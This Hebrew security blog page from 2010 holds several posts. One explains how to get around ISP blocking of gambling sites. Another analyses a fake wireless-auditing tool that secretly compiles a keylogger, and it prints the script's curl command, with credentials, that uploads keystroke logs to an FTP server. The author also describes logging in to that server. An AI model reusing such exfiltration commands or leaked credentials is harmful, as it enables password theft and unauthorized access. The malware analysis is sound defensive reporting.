הרצאה שלי במיקרוסופט על סייבר Warfare

נכתב ע"י גיא מזרחי בתאריך 29 באוגוסט 2010 | נושאים כללי | 20 תגובות »

אוהד פלוטניק שמנהל במיקרוסופט את ה-Security User Group שאל אותי לפני כמה חודשים אם אוכל להרצות בנושא מעניין לקבוצה.
אחרי המון זמן שניסינו לתאם את זה, ההרצאה שלי תתקיים ביום רביעי הקרוב.
נושא ההרצאה:
סייבר WARFARE , סכנות ברמת מדינה, מערך הגנה ברמת המדינה.
יהיו שם טעימות מנושאים שונים כגון פשעי רשת, טרור קיברנטי וכן הנושא העיקרי – Cyber Warfare.
אתם מוזמנים.

ניתן להירשם פה:

https://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032458904&Culture=he-IL

כשמוסד ממלכתי פותח תיבה ב-Gmail

נכתב ע"י yovitz בתאריך 3 באוגוסט 2010 | נושאים כללי | 30 תגובות »

לפני מס' ימים התפרסמה באתר הפירסומים הממשלתי www.pirsum.gov. המודעה הבאה :

ולעיתונות המודפסת נמסרה ההודעה הבאה :

נסיון Login לתיבה ב-gmail נתן את ההודעה הזאת:

מה שכמובן משאיר אותנו עם פתיחת התיבה על שמנו, וקבלת קורות חיים של מועמדים שכותבים :

וכמובן – דיסקרטיות זה חשוב.

ככל הנראה השימוש בתיבה של Gmail במקום בתיבה של תהיל"ה (תשתית הממשלה לעידן האינטרנט) נועד כדי לא לחשוף מי האישיות הפוליטית הבכירה שמחפשת איש תקשורת עם ניסיון במשברים תקשורתיים.

מסקנות :

1. כשמוסד ממלכתי רוצה להיות אנונימי שידאג לייצר תיבה בצורה אחראית. עדיף עם שם גנרי כמו  misra801@site.gov.il ואם זה יקר או מורכב בירוקרטית אפשר לנסות את tikshorett@lapam.gov.il (לשכת הפירסום הממשלתי) אני מאמין שהם יסתדרו עם הגדרת Forward, אבל אני לא בטוח שיסתדרו עם שיתוף פעולה חוצה משרדים ממשלתיים.

2. אין, אבל באמת אין על Copy Paste בדברים האלה. למה לייצר שגיאה בשם התיבה?

תודה ליניב אוביץ על הפוסט.

חסימת אתרי אינטרנט – האם זה אפשרי?

נכתב ע"י גיא מזרחי בתאריך 15 ביולי 2010 | נושאים כללי | 32 תגובות »

קראתי את הכתבה הזו בדה-מרקר על כך שהמשטרה ביקשה מספקיות אינטרנט לחסום אתרי הימורים.

מעניין. אני יכול לחשוב על כמה אתרים נוספים שהיה כדאי שיציעו לחסום כגון אתרי פדופיליה, אתרי שינאה, אתרי סקס ועוד סוגים רבים של אתרים. (וברצינות, אני חושב שאסור לחסום שום דבר. ניטרליות.)

למה ניטפלו דווקא לאתרי הימורים? זאת שאלה נהדרת.

אם תשאלו אותי, כנראה שהיגעו למסקנה שהאתרים האלה מזינים את עולם הפשע הפיסי והמוחשי (משפחות הפשע וכ"ו).

אם זה באמת הדבר (ואני לא מרמז על כך כי פשוט אין לי מושג) אני יכול להבין את העובדה שהמשטרה תבקש לחסום אתרים כאלה. להבין. זה לא אומר שאני מסכים עם חסימה כזו בשום צורה.

אני חייב לציין שלדעתי יש כמה וכמה אתרים שהיו ראויים יותר להיחסם והזכרתי חלק מהם קודם כגון אתרי פדופיליה ושינאה וגם אותם הייתי מעדיף שלא יחסמו כי ניטרליות הרשת חשובה יותר.

הנקודה שמעניינת אותי היא השאלה האם באמת אפשר לחסום אתרים כאלה שמרוויחים כסף רב ויכולים להשקיע סכומים נכבדים כדי להמשיך להרוויח כסף.

איך לעקוף חסימת אתרי הימורים? איך לעקוף חסימת אתרים?

יש כמה וכמה פתרונות שיאפשרו למהמר הישראלי להמשיך להוציא את כספו.

פתרון קל וזול: תיעול התעבורה דרך רשת המאפשרת אנונמיות כגון TOR. מורידים דפדפן ייעודי ונגמר הסיפור של חסימת האתר כי כל התעבורה יוצאת ממקום אחר בעולם ולא מישראל. הבעיה העיקרית עם TOR היא איטיות.

פתרון קל וזמין: תיעול התעבורה בעזרת חיבור VPN אל חו"ל. פתרון כגון Hotspot Shield יאפשר לכם להמשיך להמר. יש הרבה פתרונות דומים שתוכלו למצוא ע"י גיגול hotspot VPN.

הבעיה עם תיעול תעבורה כזה היא שמישהו יכול לראות את התעבורה שלכם – אותו ספק שירותים.

דרך חכמה יותר לצאת על העולם היא לרכוש שרת VPS שלכם (עלות של כ-10$ לחודש) ולהתקין עליו מוצר כגון OPENVPN. בצורה זו תוכלו להמשיך להינות מאינטרנט מוצפן ומתועל דרך חו"ל אך בלי שמישהו יוכל להקליט בקלות את התעבורה שלכם. (ברור, ספק ה-VPS וספק האינטרנט עדיין יכולים לעשות זאת וגם שירותי הבטחון של המדינה ממנה רכשתם את השירות אבל הם פחות מאיימים מאשר ספק שירותים לא ידוע או מפעיל שרת TOR).

אני בטוח שאתתרי ההימורים יוכלו לספק די בקלות תוכנה שתיתן את האפשרות לעשות זאת בצורה אוטומטית ובהנחה שהם יהיו חכמים (והם יהיו. יש להם מספיק כסף ומוטיבציה) הם יוכלו די בקלות לעקוף את החסימה.

ההחלטה הזאת של המשטרה תעשה חודש של בעיה ואח"כ יצירת הפתרון הזמין והקל ללקוח ייכנס בתור חלק מההוצאות של האתרים. זה לא יהיה אפשרי לחסום אותם.

איך לנסות לרמות האקרים ולצאת טמבל – פוסט אורח של יפתח עמית

נכתב ע"י יפתח עמית בתאריך 11 ביולי 2010 | נושאים כללי | 16 תגובות »

הפוסט הזה הוא תרגום של פוסט שלי (http://www.iamit.org/blog/2010/07/how-not-to-scam-security-people/) שחשבתי שיכול להתאים לפרסום בבלוג של גיא מכיוון שקהל היעד שלו הוא בעיקר אנשים שמתעסקים בהאקינג, אבטחת מידע או איך-שלא-תקראו-לזה… מקווה שתהנו (ותסלחו לי על הניסוחים הכושלים – כאמור זה תרגום).

בשבוע שעבר יצא לי "לשחק" קצת עם כלים לבדיקת רמת ההגנה של רשתות אלחוטיות בעקבות בקשה של לקוח "להריץ כלים לא שגרתיים כמו שכולם מריצים" (למרות הסלידה שלי מדרישות לכלים ספציפיים ו/או לספק רשימת מכולת של "מה אתה הולך להריץ"… נחש מה? לא משנה במה אני משתמש, אתה יכול להיות בטוח שבאיזשהו שלב אני הולך להפתיע אותך…).

במסגרת החיפוש, ובעזרתם המקרית של טק-קראנץ', הגעתי לאתר הזה המתיימר להיות מוקדש לאבטחת רשתות אלחוטיות. אז אחרי שהתגברתי על הבחילה הקלה מהעיצוב המזעזע (וכן – מוזיקת רקע באתר זה כל כך 90'…) הורדתי את 4 הקבצים האמורים להוות את הכלי. איפה ההתלבטות בכלל כשה-FBI משתמש באותם כלים…

בדיקה מהירה – ויש לנו שלושה סקריפטים (לכאורה) וזיפ (איך מתרגמים tarball לעברית? כדורזפת? טארבול?). למה לכאורה? מכיוון שכשסקריפט שאמור להיות טקסטואלי מזוהה על ידי המערכת כקובץ ELF אתה יודע שמשהוא "מסריח" קורה כאן. וכך התחיל הסיפור שנתן לי להגיע לסוף השבוע מחוייך ומבודח (בד"כ אני סתם מותש).

אז הנה סיכום "מנהלים" למה שקורה באתר של החבר שלנו שה-FBI משתמשים לכאורה בכלים שלו:

1. הכלים שהוא מספק אינם כלי אבטחת מידע בכלל. בהתחלה עוד נתתי לו להנות מהספק – נו, עוד מישהו שארז כלים ידועים בסקריפט משלו לצרכי נוחות.אבל לא. אפילו karma לא היתה כלולה שם – למרות שהסקריפט הראשי נקרא כך, ולמעשה זו הפונקציונליות שהכלי אמור היה לספק.
2. מבט זריז בזיפ מראה שהוא מכיל בכלל keylogger שנגנב מכאן.
3. כשהסקריפט הראשי מופעל, שני סקריפטים נוספים מופעלים ברקע – האחד מקמפל את ה-keylogger ומריץ אותו, והשני דואג להעלות את תעוד ההקלדות ל-FTP כדי שהמתקיף יוכל לעקוב אחריך.
4. במקביל, הסקריפט הראשי במסגרת "ההתקנה" דורש ממך לשלוח אימייל לכותב הכלי על מנת לקבל קוד אקטיבציה, ובאופן מאד נוח פותח עבורך את פיירפוקס (שועל-אש? שואש?) עם שלושה טאבים לגימייל, יאהו, והוטמייל. לטענת הסקריפט לאחר שליחת האימייל אתה אמור לקבל קוד אקטיבציה חינם אוטומטית.

נחזור ל"כלים" שלנו. כאמור הסקריפטים הם לא סקריפטים. מה נהיה? פשוט – הם היו פעם סקריפטים, אבל כדי לטשטש את מה שבאמת נעשה, הם "קומפלו" לקבצים בינריים באמצעות shc. המרת הקבצים הבינריים חזרה לסקריפטים היתה פשוטה למדי (שעורי בית -–לקרוא את התעוד של shc ולשחק עם הקבצים בבית).

עכשיו כשקצת יותר ברור מול מה אנחנו עומדים, בואו נסתכל על חלק מהקוד של הסקריפטים ומה עומד מאחוריהם. אפילו אם אתם לא סקריפטולוגים מהוללים, די קל לעקוב אחרי הנעשה (ויש אפילו הערות בקוד!!!).

אוקיי, אז אנחנו רואים איך ה-keylogger מקומפל ומותקן, ושני הסקריפטים הנוספים bg1.sh ו-bg2.sh מורצים ברקע. בשלב הבא, אנו מגיעים ל"התקנה" בה הסקריפט הראשי (כאמור karma.sh) מבקש מהמשתמש לשלוח אימייל לצרכי אקטיבציה המכיל הצהרה כי השימוש בכלי איננו משמש לעבירה על החוק.

הזכרתי כי ההתקפה כאן מכוונת לאנשים שמתעסקים באבטחת מידע והאקינג, והנה הוכחה נוספת:

read -p “Which backtrack are you using ? (bt3=3,bt4=4) ” bt

נחמד… מוודאים איתנו באיזה גירסה של BackTrack אנחנו משתמשים. לזכות כותב הסקריפט ייאמר שאכן ההתנהגות של הסקריפט משתנה בהתאם לגירסת מ"ה עליה אנחנו רצים (שינויי קונפיגורצית רשת וכו').

בשלב הבא מוודאים שהדפדפן סגור, ופותחים עבורנו את שלושת אתרי הוובמייל:

firefox https://login.yahoo.com/ &
sleep 4

firefox https://www.google.com/accounts/ManageAccount &

sleep 4

firefox http://home.live.com/

המתקיף רוצה כמובן שנבצע כניסה מלאה לאימייל שלנו (עם ניחוש לא רע המכסה את ספקי האימייל העיקריים), כדי שנשלח את הבקשה לקוד האקטיבציה – וכל זאת כאמור כאשר ה-keylogger עובד במרץ ברקע ומקליט כל הקלדה שלנו ושולח אותה ל-FTP. בדיוק כאן רוב המשתמשים ייפלו…

השלב הבא בסקריפט – האקטיבציה עצמה. או שלא.

############################

# DECOY FOR ACTIVATION CODE

clear

echo “”

read -p “ENTER ROGUE AP ACTIVATION CODE : ” pls

sleep 3

echo “You have entered an invalid code ”

echo “”

exit

############################

יש להודות כי ההערות בגוף הסקריפט משעשעות – "פתיון" האקטיבציה די ברור כאן, ובמיוחד אהבתי את ההמתנה של שלוש השניות לפני שהמשתמש מיודע כי הקוד לא נכון. אפשר ממש להרגיש שהכלי עובד קשה כדי לוודא אותו ברקע. קלאסי!

זה פחות או יותר לשלב הניתוח הטכני של הקבצים המוצעים מהאתר. אבל לא הייתי טורח לכתוב את הפוסט הזה (ולתרגם אותו – שבינתיים לוקח לי יותר זמן מכתיבת הפוסט המקורי ), אלמלא הייתי נתקל בידידינו ההאקר המפורסם בצ'אט. אז האינטראקציה התחילה כשכתבתי אימייל על מנת לראות כיצד האקטיבציה קורה, ולאחר כיום קיבלתי תשובה (ממש "מענה אוטומטי"…):

Hi

1. We are preparing the activation code for you.

2. To make worth our while, could you consider a small donation (suggest euro 11) to support the website via Paypal a/c fadzilmahfodh@yahoo.com ?

Cheers.

EMAIL VIA MY CELLPHONE FOR FAST RESPONSE

http://fadzilmahfodh.blogspot.com

אז לא רק שלא קיבלתי קוד אקטיבציה, הם "מכינים" אותו (מה זה אומר? הלכו לקטוף צמחים מיוחדים לקוד שלי?), אלא שאני מתבקש לתרום מעשר קל למסכן שעבד כל כך קשה על כתיבת כלי אבטחה משהו משהו ומעניק אותו בחינם לקהילה… אוקיי, אז עניתי בנימוס ש:

1. תודה – אני מחכה בכליון עיניים לקוד.

2. אני אשקול תרומה אולי אחרי שאנסה את הכלי.

ובמהרה קיבלתי מענה המציע לי לנסות כלי אחר (שבכלל לא קשור למה שהכלי המקורי אמור לעשות) בגרסת נסיון.

המממ, מעניין. למזלי השתמשתי בחשבון ספאמי של יאהו וכנראה שגם ידידינו… מי שלא מכיר, ביאהו אפשר לראות את הסטטוס של מי שאתה מתכתב אתו באימייל ולצ'וטט איתו דרך ממשק הווב אם הוא כרגע זמין! אז זה בדיוק מה שעשיתי…

—– Our chat on Wed, 7/7/10 2:53 PM —–

Iftach(2:34 PM): hey man

Iftach(2:34 PM): mind if a ask a couple of questions?

fadzilmahfodh(2:34 PM): okey

Iftach(2:35 PM): cool. I’m doing this research on security tools and their authors…

fadzilmahfodh(2:35 PM): okey

Iftach(2:35 PM): saw your tool and wanted to hear about how you got to write

it, how well is it distributed in the community etc…

Iftach(2:36 PM): does that activation thing a common practice with free tools?

fadzilmahfodh(2:36 PM): yes see, we need to maintain our website thus we need supporter

fadzilmahfodh(2:37 PM): everyday there are at least 500++ people asking for code

Iftach(2:37 PM): I see.

fadzilmahfodh(2:37 PM): i no longer able to provide for free

fadzilmahfodh(2:37 PM): too time consuming and i need to be compensated for my

time and effort

fadzilmahfodh(2:38 PM): hope you understand

המסכן צריך שיפצו אותו על ה"זמן והמאמץ". אוי-אוי-אוי (ותזכרו שכל המאמץ שלו מסתכם בסקריפט הונאה בלבד – הוא אפילו לא טרח לכלול איזשהו כלי לפריצת/ניתוח רשת אלחוטית שזמין באופן חופשי…)

Iftach(2:40 PM): now, about the tool – that’s a linux binary obviously (thought

it was a shell script at the beginning). Did you base it on something existing

or write yourself?

fadzilmahfodh(2:41 PM): i wrote it by my self then scramble the code

Iftach(2:41 PM): hence the activation i see…

fadzilmahfodh(2:42 PM): i can afford to give ‘free lunch’ to everybody. Hope

you understand

Iftach(2:43 PM): sure, i understand.

fadzilmahfodh(2:43 PM): So you interested in the software?

Iftach(2:44 PM): more from a research point of view – for an article I’m

writing

Iftach(2:44 PM): so, the installer you use, I see that it contains some

additional code that is being compiled on the client.

fadzilmahfodh(2:45 PM): Yes. The purpose is the code will be unique to user

hardware

Iftach(2:45 PM): and I saw that there were some FTP connections made? Is that

to verify that the client is a registered one?

fadzilmahfodh(2:46 PM): Well, that is another story…

Iftach(2:46 PM): I’m listening

fadzilmahfodh(2:46 PM): maybe some other time huh

Iftach(2:47 PM): OK. Last question – do you get a lot of account passwords

through that keylogger that sends the data to your FTP?

fadzilmahfodh(2:47 PM): sorry, no comment unless i am in court

בשלב הזה של "הראיון" שלנו, הבנתי שסיפור הכיסוי שלי הולך להיות יותר אמיתי ממה שחשבתי (ולהלן ה"מאמר" שאתם קוראים). אי אפשר להמציא שטויות כאלה, אז הייצי חייב לתעד את זה איכשהו…

Iftach(2:48 PM): aha, and it’s part of the installer because? just to make sure

people can send the activation email correctly?

Iftach(2:48 PM): Back to statistics, out of the average 500 ppl asking for

activation – how many passwords do you manage to grab?

fadzilmahfodh(2:49 PM): well, the ftp is to confirm that software match with

data in server

fadzilmahfodh(2:49 PM): if it does not match, it will fail to run

fadzilmahfodh(2:49 PM): or i can just change the data/activation code in the

server

fadzilmahfodh(2:49 PM): then everything will not run

Iftach(2:49 PM): and how does that relate to the keylogging?

fadzilmahfodh(2:50 PM): well, that i another story…

Iftach(2:51 PM): I mean – the keylogger data is sent to that FTP. Is that part

of the verification or is this a separate process?

Iftach(2:51 PM): So, on average, how many accounts you manage to get on that

FTP server per day?

fadzilmahfodh(2:51 PM): well, you do not even support my website and how the

hell am i going to tell you

Iftach(2:52 PM): Let’s just get it straight – I’m not going to “support” the

site… I’m just doing some research on security tools.

fadzilmahfodh(2:52 PM): bye

Iftach(2:53 PM): You are free to tell, or not if you don’t want to. But I’m

publishing the story as it is…

Iftach(2:53 PM): With your acknowledgment that you use a keylogger to steal your

site visitor passwords. Unless you want to be quoted otherwise in the story…

ונאמן להבטחתי לפדזיל (או איך שלא קוראים לחכמולוג שלנו), אני מפרסם את ה"ראיון" שלנו ללא שינויים משמעותיים.

אבל רגע – יש עוד! עוד? כן כן! הדובדבן על הקצפת היה בשלב ששכנעתע את עצמי להציק לידידינו רק עוד פעם אחת, ולנסות להיכנס ל-FTP שאליו הוא שולח את כל רישומי ההקלדות של המשתמשים שלו. הרי שם המשתמש והסיסמא היו באחד הסקריפטים (כאמור – "קימפול" שלהם לבינרי לא כל כך עובד עלינו…)

curl -s -k –ftp-ssl -T /pentest/log.txt -u fadzilmahfodh:buaya ftp://ftp.drivehq.com/code$number.txt

ואז הגיע המסך שהשאיר לי חיוך שהספיק לכל הסופ"ש:

כמו שאומרים priceless.

אבל אתם יודעים מה? זה הכל באשמתנו! אם היינו "תורמים" לבחור כמו שהוא בטח מתחנן לכל מי ששולח לו אימייל, אז אולי היה לו מספיק כסף כדי לשלם עבור החשבון FTP שלו ב-drivehq, והיה יכול לעשות עוד כסך מלגנוב כסף נוסף מכל מי שנפל בהונאה שלו וקיבל keylogger במתנה.

גדול מהחיים. אבל ברצינות – מוסר השכל קצר (אחרת גיא לא היה מפרסם את זה עכשיו כששנינו מרצים רציניים בטכניון ) גם כלי סקיוריטי, במיוחד ממקומות לא מוכרים, זכאים לבדיקה קצרה. אני אולי קצת אולד-פשן אבל אם אני לא רואה את קוד המקור היום, אני הולך לדייק בקטנות. תסתכלו, תנטרו (רשת, זכרון, דיסק), ותבדקו שוב. לפעמים זה אפילו משתלם…

איך למצוא את המבצעים הטובים של הוט?

נכתב ע"י גיא מזרחי בתאריך 29 ביוני 2010 | נושאים כללי | 16 תגובות »

חבר שלי, נתי כהן צמח, שלח לי את זה:

לא בטוח אם זו חולשה או בכוונה, אבל זה מצחיק ממש.

רציתי למצוא תקנון מבצע מסויים. חיפוש קצר בגוגל הוביל אותי לעמוד הזה:
http://www.hot.net.il/REGULATIONS.aspx?FolderID=906

לא היה לי את המספר שלו. אז עוד חיפוש בגוגל והפעם:
https://encrypted.google.com/search?hl=en&q=site:hot.net.il+%22%D7%9E%D7%A1%D7%A4%D7%A8+%D7%AA%D7%A7%D7%A0%D7%95%D7%9F%22

לא מצאתי אותו בדיוק אבל שמתי לב שמספר התקנון הוא בעצם תאריך הכתיבה שלו.
אז התחלתי לקרוא קצת את העמוד הקודם, והבנתי איך מחפשים:
http://www.hot.net.il/REGULATIONS.aspx?FolderID=906&Search=20100101

אז למה בעצם לא לעשות את זה:
http://www.hot.net.il/REGULATIONS.aspx?FolderID=906&Search=2%2a
טוב, כי זה לא עובד…

אבל רגע, זה כן:
http://www.hot.net.il/REGULATIONS.aspx?FolderID=906&Search=2???????

ROFL

תודה נתי